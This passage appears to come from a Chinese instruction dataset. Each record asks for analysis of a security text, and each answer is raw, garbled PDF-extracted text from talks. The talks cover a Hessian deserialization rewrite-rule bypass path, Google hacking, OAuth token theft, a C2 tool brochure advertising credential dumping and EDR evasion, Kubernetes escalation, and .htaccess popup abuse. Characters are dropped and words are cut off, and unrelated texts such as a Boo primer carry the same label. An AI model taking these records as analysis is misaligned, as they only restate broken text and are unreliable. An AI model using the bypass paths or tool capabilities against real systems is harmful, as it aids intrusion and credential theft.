但也不算很難打 Vulnerability Tomcat MI Server Reverse Proxy TLS Proxy 443 Apache 9997 MI Protocol 8443 Apache Tomcat MI Server Reverse Proxy TLS Proxy 443 Apache 9997 MI Protocol 8443 Apache Web Service speaks Hessian! Touch through Manage Interface Tomcat MI Server Reverse Proxy TLS Proxy 443 Apache 9997 MI Protocol 8443 Apache Tomcat MI Server Reverse Proxy TLS Proxy 443 Apache 9997 MI Protocol 8443 Apache Touch through User Interface???  Rewrite Rules :( RewriteRule /mifs/services/(.*)$  [R=307,L] RewriteRule /mifs/services - [F] RewriteRule /mifs/services/(.*)$  [R=307,L] RewriteRule /mifs/services - [F] /mifs/services/fooService RewriteRule /mifs/services/(.*)$  [R=307,L] RewriteRule /mifs/services - [F] /mifs/.;/services/fooService Hessian Deserialization Hessian Deserialization  Java Unmarshaller Security  A paper written by @mbechler in May 2017  Known gadgets on Hessian Deserialization: Gadget Name Effect Spring-AOP JNDI Inject", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWatching the Watchers Target Exploitation via Public Search Engines mail://johnny@ihackstuff.com http://johnny.ihackstuff.com whats this about?  using search engines to do interesting (sometimes unintended) stuff  sp3ak l1ke l33to hax0rs  act as transparent proxy servers  sneak past security  find development sites whats this about?  using search engines to find exploitable targets on the web which  run certain operating systems  run certain web server software  harbor specific vulnerabilities  harbor sensitive data in public directories  harbor sensitive data in public files  automating the process: googlescan pick your poison we have certain needs from a search engine:  advanced search options (not just ANDs and ORs)  browsing down or changed pages (caching)  instant response (zero-wait)  document and language translations  web, news, image and ftp searches The obvious choice: Google not new... Vincent GAILLOT <vgaillot@telecom.insa- lyon.fr> posted this to BUGTRAQ nearly two years ago... doing interesting stuff hax0r, Google hacks, proxy, auth bypass, finding development sites hax0r for those of us spending way too much time spe@king hax0r... /misc: Google Hacks There is this book. And its an OREILLY book. But its not about hacking. Its about searching. I didnt write it. Because if I wrote it, it would really be about hacking using Google and that would get both Google and OREILLY both really upset and then lawyers would get involved, which is never good unless of course the lawyer happens to be Jennifer Granick... =) proxy Google offers a very nice language translation service. for example, translating from english to spanish... proxy Our english-to-spanish translated Google page is: http://translate.google.com/translate (main URL) ?u=http://www.defcon.org&langpair=en|es (options) What happens if we play with the options a bit to provide an english-to-english translation, for example? http://translate.google.com/translate (main URL) ?u=http://www.defcon.org&lang", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n'\\\" t .TH \"SYSTEMD\\-RESOLVE\" \"1\" \"\" \"systemd 231\" \"systemd-resolve\" .\\\" ----------------------------------------------------------------- .\\\" * Define some portability stuff .\\\" ----------------------------------------------------------------- .\\\" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ .\\\" http://bugs.debian.org/507673 .\\\" http://lists.gnu.org/archive/html/groff/2009-02/msg00013.html .\\\" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ .ie \\n(.g .ds Aq \\(aq .el .ds Aq ' .\\\" ----------------------------------------------------------------- .\\\" * set default formatting .\\\" ----------------------------------------------------------------- .\\\" disable hyphenation .nh .\\\" disable justification (adjust text to left margin only) .ad l .\\\" ----------------------------------------------------------------- .\\\" * MAIN CONTENT STARTS HERE * .\\\" ----------------------------------------------------------------- .SH \"NAME\" systemd-resolve \\- 解析主机名IP地址域名DNS资源记录服务 .SH \"SYNOPSIS\" .HP \\w'\\fBsystemd\\-resolve\\fR\\ 'u \\fBsystemd\\-resolve\\fR [OPTIONS...] \\fIHOSTNAME\\fR... .HP \\w'\\fBsystemd\\-resolve\\fR\\ 'u \\fBsystemd\\-resolve\\fR [OPTIONS...] \\fIADDRESS\\fR... .HP \\w'\\fBsystemd\\-resolve\\fR\\ 'u \\fBsystemd\\-resolve\\fR [OPTIONS...] \\-\\-type=\\fITYPE\\fR \\fIDOMAIN\\fR... .HP \\w'\\fBsystemd\\-resolve\\fR\\ 'u \\fBsystemd\\-resolve\\fR [OPTIONS...] \\-\\-service [[\\fINAME\\fR]\\ \\fITYPE\\fR]\\ \\fIDOMAIN\\fR .HP \\w'\\fBsystemd\\-resolve\\fR\\ 'u \\fBsystemd\\-resolve\\fR [OPTIONS...] \\-\\-openpgp \\fIUSER@DOMAIN\\fR .HP \\w'\\fBsystemd\\-resolve\\fR\\ 'u \\fBsystemd\\-resolve\\fR [OPTIONS...] \\-\\-tlsa \\fIDOMAIN\\fR\\fI[:PORT]\\fR .HP \\w'\\fBsystemd\\-resolve\\fR\\ 'u \\fBsystemd\\-resolve\\fR [OPTIONS...] \\-\\-statistics .HP \\w'\\fBsystemd\\-resolve\\fR\\ 'u \\fBsystemd\\-resolve\\fR [OPTIONS...] \\-\\-reset\\-statistics .SH \"描述\" .PP \\fBsystemd\\-resolve\\fR 利用 \\fBsystemd-resolved.service\\fR(8) 系统服务解析主机名IP地址域名DNS资源记录服务 默认情况下参数列表将被视为域名/主机名的列表程序的输出将是它们所对应的 IPv4 或 IPv6 地址 如果参数符合 IPv4 或 IPv6 格式那么表示反解析IP地址所对应的主机名 .PP ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n001 Speaker@YongShao     Whoami Oauth2.0    ()!    Web https://facebook.com/dialog/oa uth?response_type=code&clien t_id=CLIENT_ID&redirect_uri=R EDIRECT_URI&scope=email&sta te=1234zyx   https://open.weixin.qq.com/connect/oauth 2/authorize?appid=wxc43*******&respon se_type=code&scope=snsapi_base&redirec t_uri=http://baidu.com&state=********** *&connect_redirect=1#wechat_redirect Token Leak Timelime: 2018.02.13 Redirect vulnerability 2018.03.20 Find token leak 2018.03.21 Report Vulnerability 2018.03.30 Fixed Detail   Detail Detail POC/EXP Write js Write php POC/EXP POC/EXP IM Login Redirect     Qrljacking Qrljacking Qrljacking Qrljacking Qrljacking Qrljacking app app app CSRF CSRF /oauth/weibo/redirect CSRF CSRF CSRF API Leak API Leak API Leak Login Google Jetbrains Team Work Use old poc xss Platform got it Demo MP4 Other Redirect Bypass :::25/.. #25 :::25/.. :::25 :::25 :::55.5:::25 2#5 :::55.525 :::55.525 :::55.525 :::55.5%25 :::55.525 :::55.525 Help Me(how to fixed) Help Me(how to fixed) ! How$I$Hacked$[Oculus] OAuth$+Ebay$+IBM Stealing$Facebook access_tokens$using$CSRF in$device$login$flow Internet$Explorer$has$a URL$problem Authentication$bypass$on Airbnb$via$OAuth$tokens theft Stealing$Access$Token$of One-drive$Integration$By Chaining$CSRF Vulnerability Stealing$0Auth$Token (MITM) Finding$hidden$gems$vol. 1:$forging$OAuth$tokens using$discovered$client$id and$client$secret Speaker@YongShao", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBoo Primer by Cameron Kenneth Knight Converted to PDF from the original HTML at boo.codehaus.org on May 27, 2008. NOTE: Hyperlinks do not work in the PDF version. Part 01 - Starting Out http://boo.codehaus.org/Part+01+-+Starting+Out?print=1 1 of 3 5/27/2008 9:05 PM Part 01 - Starting Out Part 01 - Starting Out Boo is an amazing language that combines the syntactic sugar of Python, the features of Ruby, and the speed and safety of C#. Like C#, Boo is a statically-typed language, which means that types are important. This adds a degree of safety that Python and other dynamically-typed languages do not currently provide. It fakes being a dynamically-typed language by inference. This makes it seem much like Python's simple and programmer-friendly syntax. C# int i = 0; MyClass m = new MyClass(); Boo i = 0 m = MyClass() Hello, World! A Hello, World! program is very simple in Boo. Don't worry if you don't understand it, I'll go through it one step at a time. helloworld.boo print \"Hello, World!\" // OR print(\"Hello, World!\") Output Hello, World! Hello, World! First, you must compile the helloworld.boo file to an executable. 1. Open up a new command line 2. cd into the directory where you placed the helloworld.boo file. 3. booc helloworld.boo (this assumes that Boo is installed and in your system path) helloworld.exe OR, if you are using Mono, 4. mono helloworld.exe 5. 1. Using the print macro, it prints the string \"Hello, World!\" to the screen. OR 2. Using the print function, it prints the string \"Hello, World!\" to the screen. 3. Now these both in the end, do the same thing. They both call System.Console.WriteLine(\"Hello, World\") from the .NET Standard Library. Recommendation Using the macro version (print \"Hello, World!\") is recommended. And it's that simple. Comparing code between Boo, C#, and VB.NET Now you may be wondering how Boo could be as fast as C# or VB.NET. Using their Hello World programs, I'll show you. Boo Part 01 - Starting Out http://boo.codehaus.org/Part+01+", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n副本 Apache Solr 组件安全概览 组件概述 1.关键词 企业级全检索服务器基于Lucene 2.些名词 (1) 数据 结构化数据与非结构化数据 结构化数据 用表字段表示的数据 数据库适合结构化数据的精确查询 半结构化数据 xml html 非结构化数据 文本文档图片音频视频等 (2) Document 被索引的对象索引搜索的基本单元个Document由多个字段Field构成 Field 字段名name 字段值value 字段类型type FieldType(这个fieldtype也有很多属性主要两个是name 以及 class 来存放该 类型值的类名)Field中包含分析器(Analyzer)过滤器(Filter) (3) 索引 对列值创建排序存储数据结构={列值行地址} Luncene或者说Solr的索引的创建过程其 实就是分词存储到反向索引中 输入的是苍老师想要得到标题或内容中包含苍老师的新闻列表 (4) 搜索引擎 区别于关系数据库搜索引擎专门解决大量结构化半结构化数据非结构化文本类数据的实时 检索问题 这种类型的搜索实时搜索数据库做不了 (5) 搜索引擎工作原理 1从数据源加载数据分词建立反向索引 2搜索时对搜索输入进行分词查找反向索引 3计算相关性排序输出 (5) zookeeper zk是分布式系统中的项协调服务solr将zk于三个关键操作 1集中化配置存储和分发 2检测和提醒集群的状态改变 3确定分代表 (7) Lucene 一套可对大量结构化半结构化数据非结构化文本类数据进行实时搜索的专门软件最早应 用于信息检索领域经谷歌百度等公司推出网页搜索而为大众广知后又被各大电商网站采 用来做网站的商品搜索现广泛应用于各行业互联网应用 核心构成数据源(存储的数据)分词器(英文比较容易中文两个常用的 IKAnalyzer mmseg4j主谓宾等)反向索引倒排索引相关性计算模型(例如 出现次数这个算简单 的复杂点的 可能就会加上权重搜索引擎会提供一种或者多种) (8) Solr中的Core 运在Solr服务器中的具体唯命名的可管理可配置的索引台Solr可以托管个或多 个索引solr的内核是运在solr服务器中具有唯命名的可管理和可配置的索引台solr 服务器可以托管个或多个内核内核的典型途是区分不同模式(具有不同字段不同的处 理式)的档 内核就是索引为什么需要多个因为不同的档拥有不同的模式字段构成索引存储 式商品数据和新闻数据就是两类完全不同的数据这就需要两个内核来索引存储它们 每个内核都有个 内核实例存放录内核索引数据存放录内核配置件 (solrconfig.xml)内核模式件(schema.xml) (9) Solr中的schema 包含整个架构以及字段和字段类型来告诉solr被索引的档由哪些Field组成让solr知 道集合/内核包含哪些字段字段的数据类型字段该索引存储 conf/managed-schema 或者 schema.xml (10) solrconfig.xml 此件包含与请求处理和响应格式相关的定义和特定于核的配置以及索引配置管理内 存和进提交内核配置件这个是影响Solr本身参数最多的配置件索引数据的存放位 置更新删除查询的些规则配置 (11) collection 集合 个集合由个或多个核(分)组成SolrCloud引了集合的概念集合将索引扩展成不 同的分然后分配到多台服务器分布式索引的每个分都被托管在个solr的内核中(个内 核对应个分呗)提起SolrCloud更应该从分的度不应该谈及内核 (12) Solr.xml 它是$ SOLR_HOME录中包含Solr Cloud相关信息的件 要加载核Solr会引此 件这有助于识别它们solr.xml 件定义了适于全部或多个内核的全局配置选项 (13) core.properties 代表个核为每个核定义特定的属性例如其名称核所属的集合模式的位置以及 其他参数 (14) Solr配置集 configset 于实现多个不同内核之间的配置共享 (15) requestHandler(solrconfig.xml) 请求处理程序定义了solr接收到请求后该做什么操作 Solr中处理外部数据都是通过http请求对外提供http服务每类服务在solr中都有对应的 request handler接收处理数据solr中有定义了很多内置的请求处理程序但是我们也可以 定义在conf/solrconfig.xml中配置 在 conf/solrconfig.xml中requestHandler的配置就像我们在web.xml中配置servlet- mapping或spring mvc 中配置controller 的requestMap一样配置该集合/内核下某 个请求地址的处理类 示例", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCSerV2 Final 版产品介绍 产品名称CSer C2 适用操作系统平台Windows 注新版本增改内容详见文中红字部分及最后一页的更新记录 产品简介 1 采用 C/T/B 架构即 Controller控制端TeamServer服 务器端Beacon客户端 三端支持多用户在线并实 时共享所有信息 2 Controller 端发布的任务支持同步和异步两种方式同步方 式可以实时的执行任务和查看任务执行结果异步方式则可 以实现类似于离线任务的效果即 Controller 可以一次性下达 多个任务Beacon 端会依次取出任务执行并将结果返回给 TeamServer 3 使用 Profile 定制化通讯协议降低被特征化的机率 4 除了基本的管理功能外还拥有大量的适用于各种环境的渗 透测试模块用于高效地辅助渗透测试 产品特性 1 具备更为详细的信息收集功能运行时环境探测以及域内网 渗透相关功能 2 加强了 AV/EDR 对抗能力同时对静态以及动态两方面进行了 处理优化有效规避了常见 AV/EDR 的检测在低成本情况 下无需用户进行二次处理即可达到较高的 ABU(Anti BypassUndetectable) 效果 3 Beacon 端拥有很高的稳定性和兼容性可在不同版本的 windows 操作系统上稳定运行 4 提供了两种 Beacon 端持久化的方式新的 COM 劫持方法以 及更加隐蔽的计划任务 5 提供了两种 Beacon 端植入模式Solo L&C即手动植入模 式主要用于已获得初始访问权比如交互式 shell的场景 下使用Solo D4All即下载者模式主要用于获取初始访 问权的场景 6 提供了一种一次性使用 Beacon 的方式RunOnce单次运行 模式, 用于临时需要使用的场景 7 重构了内存中的 C2profile有效规避了 AV/EDR 的内存扫 描 功能列表 1 对目标网站进行 Clone为后续攻击进行准备工作 2 将 TeamServer 临时作为 WebServer 来使用供远程下载文 件 3 提供探针功能刺探访问者系统浏览器等信息 4 提供模版类型的鱼叉式钓鱼功能 5 提供 SOCKS 代理功能 6 内网端口扫描 7 屏幕截图 8 文件管理功能 9 进程管理功能 10 将 teamserver 与控制端进行分离防止 teamserver 被入侵或 teamserver 所在机器运行防病毒软件时导致核心功能丢失 11 对通讯进行二次加密防止流量被监控降低被检测风险 12 系统基本信息包括 CPU 信息内存信息GPU 信息用户 名机器名IP 地址MAC 地址等基础信息 13 系统服务信息枚举系统服务信息 14 补丁信息枚举同时通过补丁信息列出对应的漏洞 CVE 编 号 15 CLR 版本检测枚举目标机器上的 CLR 版本 16 EDR 检测检测目标机器上的 EDR 信息并列出其版本对 应的服务其所在目录等信息 17 虚拟机检测通过各方面包括 BIOS 信息内存大小注册 表分辨率CPU 温度等各种信息来判断目标系统是否为虚 拟机 18 运行时安全检测检测杀软基本信息以及系统补丁基本信息 列出杀软的名称以及安装目录系统安装的补丁以及安装时 间 19 软件信息检测检测目标机器上所安装的软件信息内容包 括软件名版本号软件开发公司安装时间安装目录 架构等基本信息 20 运行时权限检测包括检测 applocker 选项UAC 选项 Token 权限信息 21 网络连接信息包括 4 方面目标机器 DNS 缓存信息ARP 协议连接信息TCP 协议连接信息UDP 协议连接信息 22 本地 hash 提取 23 本地明文密码提取 24 RDP 明文密码提取 25 通过 lsass 进程获取密码 26 域内 hash 提取 27 域内 tickets 提取 28 通过 RDP 协议远程执行命令 29 通过 DCOM 远程执行命令 30 无文件远程命令执行 31 通过 SMB 远程执行命令 32 通过 WinRM 远程执行命令 33 通过 WMI 远程执行命令 34 黄金票据 35 白金票据 36 LDAP 查询域内基本信息内置部分查询语句 37 票据传递 38 域内基本信息收集 39 新增了自定义的 TeamServer 以及 C2Profile 生成器本地数据 库保存方便随时读取修改 40 新增了全版本通用的 BypassUAC 以及 GetSystem 功能使用 smart inject 自动挑选最佳的注入进程与方式 41 minidump 允许用户通过 PID 或进程名 dump 任意进程并自 动加密压缩保存允许用户自动下载并配备对应解密工具 42 新的 Beacon 生成器 对 beacon 做了全方位的 ABU免杀处理极", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n知道创宇404实验室发布 打造世界领先网络空间测绘能力 演讲人 heige@0x557 hei@knownsec.com 2019 PART 01 Xmap 2.0 发布 目录 CONTENTS PART 02 节点分析 PART 03 ZoomEye50 0节点计划 PART 04 IPv6 测绘 01 02 03 04 05 PART 05 ZoomEye全球 蜜罐识别  获取更多数据  赋予数据灵魂 两个关键 heige 探测资源及技术已经成为网络空间测绘的核心竞争力 CLICK ADD RELATED TITLE TEXT, AND CLICK ADD RELATED TITLE TEXT, CLICK ADD RELATED TITLE TEXT, CLICK ON ADD RELATED TITLE WORDS. PART.01 Xmap 2.0 发布 Xmap 2.0 发布  Xmap是ZoomEye核心探测引擎IP  IP探测引擎的疼点 a. 单一追求速度而忽略了效果 b. 速度快意为着高并发同时意味着高丢包 c. 扫描节点IP被拦截拉黑 Xmap 2.0 发布  效果平均每月提升了6.4倍的数据量  一键部署安装给500节点计划打下基础 CLICK ADD RELATED TITLE TEXT, AND CLICK ADD RELATED TITLE TEXT, CLICK ADD RELATED TITLE TEXT, CLICK ON ADD RELATED TITLE WORDS. PART.02 节点分析 Shodan节点分析  Shodan 现有节点分析 a. 2019.03 fdns/rdns记录提取去重外网ip数131个 b. 其中带census的记录提取去重外网ip数77个 c. 集中分布在荷兰法国罗马尼亚美国冰岛等  从某些端口扫描行为推测Shodan可能存在通过某些代理池技术进行扫描 Censys节点分析  Censys 现有节点分析 a. 2019.03 fdns/rdns记录提取去重外网ip数406个 b. 其中带worker的记录提取去重外网ip数304个 c. 主要集中在198.108.66.*/198.108.67.* [美国\",\"密歇根州\",\"\",\"\",\"merit.edu\"]  2019.03 从某些端口扫描行为分析发现活动ip数86个 CLICK ADD RELATED TITLE TEXT, AND CLICK ADD RELATED TITLE TEXT, CLICK ADD RELATED TITLE TEXT, CLICK ON ADD RELATED TITLE WORDS. PART.03 ZoomEye500节点计划 ZoomEye500节点计划 基于最新Xmap 2.0架构  目前部署约200个节点将扩充到500个节点  节点分布广泛美国日本新加坡泰国俄罗斯印度等 heige 多维度的数据关联才能得到更丰满的数据灵魂 CLICK ADD RELATED TITLE TEXT, AND CLICK ADD RELATED TITLE TEXT, CLICK ADD RELATED TITLE TEXT, CLICK ON ADD RELATED TITLE WORDS. PART.04 IPv6 测绘 IPv6 测绘 域名 > IPv4  > 暗网  > IPv6 目前接近1亿的IPv6地址库最近平均每周增加7万 数据合作+自主爬虫 探测引擎Xmap -IPv6版 a. 支持所有ZoomEye IPv4的端口协议 b. 平均每周增加约200w条数据跟节点资源投入相关 IPv6 测绘 IPv6 测绘 heige 蜜罐部署 vs 蜜罐识别>网络空间测绘领域的主要对抗面 CLICK ADD RELATED TITLE TEXT, AND CLICK ADD RELATED TITLE TEXT, CLICK ADD RELATED TITLE TEXT, CLICK ON ADD RELATED TITLE WORDS. PART.05 ZoomEye全球蜜罐识别 ZoomEye全球蜜罐识别 网络空间外网蜜罐主要用来对抗僵尸网络GPT网络空间mass扫描等攻击是威胁情报的主要 来源之一 随着攻防博弈白热化蜜罐识别诊断成为必然 蜜罐也是一种服务或者说应用一样存在自己的特定的banner数据体现所以蜜罐是可 被识别 ZoomEye全球蜜罐识别 ZoomEye全球蜜罐识别 端口分布 ZoomEye全球蜜罐识别 IDC分布 heige ZoomEye关注一切网络空间测绘IP 画像相关数据 ZoomEye期待更多的合作 heige 黄婆卖瓜也得用户夸 ZoomEye are ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nKubernetes Privilege Escalation: Container Escape == Cluster Admin? Yuval Avrahami & Shaul Ben Hai, Palo Alto Networks #BHUSA @BlackHatEvents whoami  Cloud security researchers @PANW  Vulnerability research in the cloud  Azurescape  Threat hunting in the cloud  Slioscape Kubernetes Privilege Escalation: Container Escape == Cluster Admin? Agenda  Container Escapes  Kubernetes 101  Malicious Node  Attack Classes  Escape == Admin?  Recommendations & Takeaways Container Escapes Do containers contain?  Containers are great for packaging & deploying software  Weak security boundary  Escapes will inevitably occur  Vulns in 2022 alone: DirtyPipe, containerd CVE-2022-23648, multiple kernel vulns @Google's kctf, cri-o CVE-2022-0811  Misconfigurations: privileged containers, host mounts, etc  In-the-wild malware: Siloscape, TeamTNT  What's the impact? Kernel Obvious Impact: Compromised Node  Container Escape == Cluster Admin?  Container Escape == Cluster Admin? (Feb)  We looked into the most popular platforms  In half, by default escape == admin Terminology  Admin  Admin-equivalent Few trivial steps Kubernetes 101 Kubernetes 101  Orchestrates pods (containers) on nodes (VMs)  It's everywhere Kubernetes 101 - Authentication  Certificates: users & nodes  ServiceAccount tokens: pods Kubernetes 101 - Authorization (RBAC)  Perms expressed <verb> <resource>  list secrets, create pods  Perms grouped into Roles  Bindings grant Roles  ns-scoped  cluster-wide Permission grant to Pod list services list pods Grants Role to identity Pod's SA token can list services & pods </101> Post Container Escape Credentials on a Rogue Node  Kubelet credentials  Restricted: NodeAuthorizer & NodeRestriction  Node perms != admin  Neighboring pods' service accounts  Permissions vary Node's interesting permissions are largely its pods' permissions! Trampoline Pods  Powerful pods with enough permissions to bounce you around the cluster  Reach higher privileges  Jump to other nodes  Feel young again Know You", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe Internets Private Cops Wendy Seltzer EFF Staff Attorney wendy@eff.org <http://www.eff.org> DEFCON 11, August 2, 2003 11/23/2009 2 The Internets Private Cops  Early view: The Internet can route around law  Later view: Maybe it cant. We need to work with the law itself. 11/23/2009 3 RIAA v. Verizon  subpoena: RIAA demands identities of four alleged KaZaA users from Verizon  challenge: Verizon withholds names, goes to court for user privacy  court order: Reveal the names  decision currently being appealed 11/23/2009 4 Law enforcement is not just the government 11/23/2009 5 Private actors have many legal mechanisms at their disposal  cease-and-desist letters  subpoenas  civil lawsuits  private investigation (discovery)  cooperation with state and federal prosecutors 11/23/2009 6 Internet architectures facilitate private control  Law and technology create chokepoints: centralization in the decentralized network  ISPs, backbone providers, DNS  Public content on the Net is stored on private servers 11/23/2009 7  Internet enables more people to publish, cheaply, to more other people;  It also enables more people and corporations to monitor that speech  Claims of copyright infringement  The work draws inspiration from (copies) another  or interoperates with (circumvents) another  Claims of trademark infringement  Claims of patent infringement  11/23/2009 8 Chilling Effects the shadow of the law  Legal threats may not have merit but still deter online activity  Threats such as: an injunction, disgorgement of revenues and/or statutory damages, as well as attorneys fees and costs for such litigation 11/23/2009 9 http://www.chillingeffects.org/ 11/23/2009 10 11/23/2009 11 11/23/2009 12 Resisting the Chill  Legal threats are often used against obnoxious but not illegal activities.  To resist the chill, know the law and legal defenses. 11/23/2009 13 Copyright  Infringement and secondary liability  DMCA  DMCA subpoenas  DMCA safe harbor, notice & takedown  DMCA anticircumventio", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDefCon (China) 1, Beijing 2019 Breaking the back end! Gregory Pickett, CISSP, GCIA, GPEN Chicago, Illinois gregory.pickett@hellfiresecurity.com Hellfire Security Overview Transit Systems Reverse Engineering My Discoveries The Exploit The Lessons Brief History The Anatomy of a Subway Hack (2008) NFC Subway Hack (2012) How to Hack All the Transport Networks of a Country (2012) Breaking Korea Transit Card with Side-Channel Attack (2017) How This Is Different This is not illegal We arent sneaking into the station We arent hacking their terminals We arent social engineering anyone or attacking their wired/wireless network This is not about the hardware We arent cracking anyones encryption We arent cloning the magstripe, RFID, or NFC How This Is Different This Is About Flaws in the Application Logic OK. Cloning is involved but it is not the vulnerability exploited Using AppSec to attack Complex Multi- Layered Real World Solutions Elevated Train Bangkok Mass Transit System (BTS) Elevated rapid transit system in Bangkok, Thailand Serves Greater Bangkok Area Operated by Bangkok Mass Transit System PCL (BTSC) 43 stations along two lines Tickets Stored-Value Card (NFC) All Day Pass (Magstripe) and Single Journey (Magstripe) Two magstripes Hole through one magstripe Only 0.27mm thick Tickets Tickets Tickets Gates Entering Exiting Why Them? Magstripe Really? There had to be something there! Threatening To For Years Had to Before Moving On  The Equipment Standard Reader/Writer Manufactured in China Standards or Raw Read Errors Rare Reliable Performance The Questions Data Location Encoding Schemes Data Changes Data Meaning System Response Data Tampering Repeating states or out of order transitioning Lab Work Reading the magstripes Decoding the data Lab Work Lab Work Attempted Decode Using Standards International Organization for Standardization 6-bit Character sets and 4-bit Character sets Some With Parity and Some Without Attempted Decode both forwards and backwards It wasnt usin", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n原文 by [看雪学院](https://mp.weixin.qq.com/s?__biz=MjM5NTc2MDYxMw==&mid=2458286843&idx=1&sn=15e3d1aa8ae418cc5ed6010b390388b6&chksm=b1814a7186f6c367a24033a297edc3fe2275334f45fd0b944bb606dc449e027beb1b4bc6997d&scene=0#rd) 这是关于使用htaccess进行开发的两部分系列的第一部分我将在这里介绍一些基本的众所周知的方法还有一些鲜为人知的方法在第2部分中我将通过使用htaccess来开发更高级的开发方法 在本指南中我将尝试解释.htaccess的各种非常规用法这些用法对于渗透测试和后渗透攻击非常有用我假设大多数读者会对.htaccess有所了解但是对于那些不了解的人我会提供一个简短的解释不管你对htaccess规则是否熟悉我都希望这些内容很容易被大家掌握 我将要介绍的内容中有一些方法有点过时了但是其中很多依旧在使用着并且即使是过时的方法当攻击者在攻击一台没有对软件及时更新的机器也是可以成功利用的 对于那些不熟悉.htaccess的人这里是一个简短的解释来自htmlgoodies.com htaccess是超文本访问Hypertext Access的缩写是一个基于Apache的Web服务器使用的配置文件用于控制它所在的目录以及该目录下的所有子目录 很多时候如果你已经安装了内容管理系统CMS比如DrupalJoomla或者Wordpress你可能会遇到.htaccess文件 一般来说你不需要编辑它但这个文件是你上传到Web服务器的文件之一 .htaccess文件的主要功能包括使用密码保护文件夹禁止或允许用户使用IP地址访问禁止目录浏览将用户自动重定向到另一个页面或目录创建和使用自定义错误页面改变具有特定扩展名的文件的使用方式或者通过指定文件扩展名或特定文件作为主页 简而言之这是一套包含在您的网络服务器上的规则在一个名为.htaccess的文件中它允许您执行诸如使用密码保护目录或为扩展创建别名等选项例如如果您有一个页面 `http://site.com/something/file.php` 你可以设置一个htaccess的规则以便当页面加载时将使用户`http://site.com/something/file` 隐藏扩展名 - 或者你 可以使用它来做一些像302重定向一个页面到另一个或HTTP 403的目录 下面是一个htaccess文件的例子 ``` ### MAIN DEFAULTS Options +ExecCGI -Indexes DirectoryIndex index.html index.htm index.php DefaultLanguage en-US AddDefaultCharset UTF-8 ServerSignature Off ``` 有趣的是你需要在所有.htaccess文件中添加ServerSignature Off指令因为这样的话可以阻止在目录列表上显示你的服务器信息这使得攻击者的侦察阶段会有非常明显的提示所以说这个时候最好通过你的httpd.conf来完成对web服务的控制而不是你的htaccess文件 我将主要关注的重点放在.htaccessmod_rewrite中的apache的重写模块这个模块允许重定向发生 那么我们开始吧 ## 用连续的弹出窗口骚扰互联网用户 我将要讨论的第一种方法是如何在他们试图利用的站点上滥用mod_rewrites来连续弹出窗口 这是一个非常简单的方法您可以将图像上传到服务器然后使用htaccess文件来利用密码保护目录并将该图像重定向到该密码保护的目录中的文件 除了.htaccess之外还需要一个.htpasswd文件它将包含密码保护目录的登录凭证 这个方法只是一个有趣的没有任何实际价值但我曾经看到它在以前的流行论坛上被利用它是非常有效的 为了演示这个例子我们假设我们有两个文件lol.jpg和umad.jpg其中lol.jpg存储在一个公共目录中umad.jpg存储在一个受密码保护的目录中 这里对应的.htaccess文件应该是类似与这样 ``` Options +FollowSymlinks RewriteEngine on RewriteRule lol.jpg /protected-directory/umad.jpg [NC] AuthUserFile /home/usr/.htpasswd AuthName r u mad tho AuthType Basic require user lolololololol ``` 除此之外您还需要设置一个如", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n大陆浏览器安全 宋雷 1 大陆浏览器市场特点  面临安全问题与国际市场迥异  由于金山/腾讯/360导致漏洞补丁很快0day几 乎不会规模性出现  主要威胁为小成本钓鱼下载欺骗点对点社 会工程网购诈骗 2 金山网络在浏览器安全的积累  2009年我们在业界率先推出了首款基于浏览器 的专业防护产品 - 金山网盾  除360以外的国内主流浏览器产品安全技术几乎全 部基于金山云开放平台开发  金山毒霸在网购保护方面做出了诸多的创新如 敢陪模式等 3 遨游浏览器 Maxthon) 金山云开放平台 搜狗浏览器(Sogou) 360云平台 360浏览器 4  在做安全的路上我们反复在思考 到底什么样的浏览器才是安全的  让我们先来看看我们遇到的威胁并分类介绍各 类威胁的解决方案 5 威胁一钓鱼与欺诈  在用户浏览网页过程中浏览器将用户访问的网 址hash后提交给服务器服务器根据恶意网址库获 取当前网址安全性  厂商通过自己的蜘蛛与用户反馈来完善自己的恶 意网址库 6 威胁一钓鱼与欺诈  DEMO 7 威胁一钓鱼与欺诈 8 威胁一钓鱼与欺诈 9 威胁二漏洞攻击  大陆浏览器多基于在IE与chromium开发比如360 安全基于ie360极速ie+chromium猎豹基于 ie+chromium  ie的漏洞每家都有比较成熟的技术比如金山的 网盾360的网盾可以阻止ie核下常见的漏洞攻 击进程启用dep, aslr拦截可疑文件执行加载 堆喷射地址占坑特定函数检测返回地址等等 10 威胁二漏洞攻击 11 威胁二漏洞攻击 12 威胁二漏洞攻击  chromium的漏洞在一个chromium核的漏洞被公 告后第三方厂商多很被动多只能等chromium 解决后更新  自身引入的漏洞比如前段时间的360浏览器的 external问题360信任指定域下网站可以使用 external导出函数比如修改首页历史记录等 如果这个域存在xss问题将面临很大的安全风险 13 威胁二漏洞攻击  DEMO 14 威胁二漏洞攻击 15 威胁二漏洞攻击 16 威胁三下载威胁  